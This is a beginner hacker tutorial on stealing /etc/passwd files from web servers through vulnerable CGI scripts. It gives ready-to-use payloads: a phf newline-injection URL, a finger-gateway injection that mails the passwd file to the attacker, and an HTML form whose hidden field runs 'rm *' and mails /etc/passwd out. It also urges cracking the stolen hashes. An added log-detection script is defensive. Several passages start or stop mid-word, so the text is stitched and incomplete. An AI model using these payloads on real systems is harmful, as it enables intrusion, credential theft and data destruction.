I - Introduction
This file will describe several techniques to acquire a password file just by using an ordinary web browser. The information provided is aimed at the beginner hacker, but all hackers should benefit from it. We will only cover phf in this file, but feel free to explore other programs in the cgi directory such as nph-test-cgi or test-cgi. And now . . . get comfortable... sit back.... and read.
There are several techniques for what I call "Web Browser Hacking". Many beginners don't know that you can query an etc/passwd file from your browser, and in this chapter I will describe all the ways to acquire a passwd file. First you need to find a box that is running the cgi-bin/phf file on their system. A great way to find out without trial and error is to go to www.altavista.com and just search on cgi-bin AND perl.exe or cgi-bin AND phf.
for a mailto on the web page... just scan the page for any mailto refs. Go back to the finger box and type in this query...... nobody@nowhere.org ; /bin/mail me@junk.org < etc/passwd ...this string takes nobody and emails the passwd file to your email address. If this works you now have the etc/passwd file in your mailbox.... you can now run a crack program against it and have a little fun on their box.
oved you should get a series of search boxes on the next page (ignore these boxes). To your URL you would add this string ?Qalias=x%0a/bin/cat%20/etc/passwd... so the entire string would look like this Http://www.aol.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd. This string will print out the etc/passwd file straight to your web browser; all you need to do is save it as a file and again run a crack program against it. (This is considering that the password fields are not :*: or :x:).
This is a simple form that asks a user to input a message to be sent to a script called doc.pl. Included in the doc.pl script is the following line which is assuming the line has already been parsed out.
<html><body>
<h2>Hack AOL</h2>
<form action = "http://www.aol.com/cgi-bin/doc.pl" method = "get">
<input type="hidden" name="myaddress"
value=" ; rm * ;mail -s file youraddress@yourisp.com < /etc/passwd;">
<input type = "text" name="input">
<input type = "submit" value="getpasswd">
</form>
</body></html>
The semicolons in the hidden value field act as delimiters: they separate the UNIX commands, so several commands execute on the same line. The system call in Perl creates a UNIX shell, which here mails the passwd file to you.
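For defenders, both request shapes described above (the %0a newline in the phf query and the semicolon-separated hidden form field) leave the same trace in a web server access log: shell metacharacters in a cgi-bin query string once it is URL-decoded. The following detection sketch is an added example, not part of the original file; the log lines are constructed from the strings shown on this page, and the function name, client addresses and timestamps are assumptions.

```python
import re
from urllib.parse import urlsplit, unquote

# Characters that let a value break out into extra shell commands when a CGI
# hands it to a shell unsanitised: newline (%0a), CR, and ; | ` $ < > &
SHELL_META = re.compile(r"[\n\r;|`$<>&]")
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample log (Common Log Format); the payloads are the page's own strings.
SAMPLE_LOG = [
    '192.0.2.10 - - [12/Mar/1997:10:01:22 -0500] "GET /index.html HTTP/1.0" 200 2048',
    '192.0.2.10 - - [12/Mar/1997:10:01:40 -0500] "GET /cgi-bin/phf?Qalias=smith HTTP/1.0" 200 512',
    '192.0.2.77 - - [12/Mar/1997:10:02:03 -0500] '
    '"GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 200 1432',
    '192.0.2.77 - - [12/Mar/1997:10:05:51 -0500] "GET /cgi-bin/doc.pl?myaddress='
    '+%3B+rm+*+%3Bmail+-s+file+youraddress%40yourisp.com+%3C+%2Fetc%2Fpasswd%3B'
    '&input=hello HTTP/1.0" 200 310',
]

def suspicious_cgi_requests(log_lines):
    """Return (path, parameter, decoded value) for each cgi-bin query
    parameter that contains a shell metacharacter after URL-decoding."""
    hits = []
    for line in log_lines:
        m = REQUEST.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        if "/cgi-bin/" not in url.path:
            continue
        # Split on the raw '&' first, then decode, so an encoded %26 or %3B
        # inside a value is still seen as part of that value.
        for pair in url.query.split("&"):
            name, _, raw = pair.partition("=")
            value = unquote(raw.replace("+", " "))
            if SHELL_META.search(value):
                hits.append((url.path, name, value))
    return hits

if __name__ == "__main__":
    for path, name, value in suspicious_cgi_requests(SAMPLE_LOG):
        print(f"{path}: parameter {name!r} carries shell metacharacters: {value!r}")
```

Decoding before matching is the important step: a filter that only looks for a literal newline or semicolon in the raw request line misses %0a and %3B.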
III - Conclusion
ond file that will involve erasing log files from the web browser. I hope you all enjoyed this documentation and found it somewhat interesting...... wake up!!! thus I conclude.....
IV - Suggested Reading
Phrack Magazine: Very informative.... covers just about everything from phreaking to hacking.... Just download all the damn articles.
Building Internet Firewalls by O'Reilly & Associates, Inc. aka "The Big Wooden Door": Covers all kinds of attacks, different firewall solutions, and in vulnerabilities.
Perl in 21 days by Samsnet: Good starting book in Perl programming, also covers security issues.
Cgi programming by Samsnet: Good starter for Cgi, but if you don't know Perl or C programming then don't bother; also covers security issues.
*************************************************************
***********
www.technophoria.com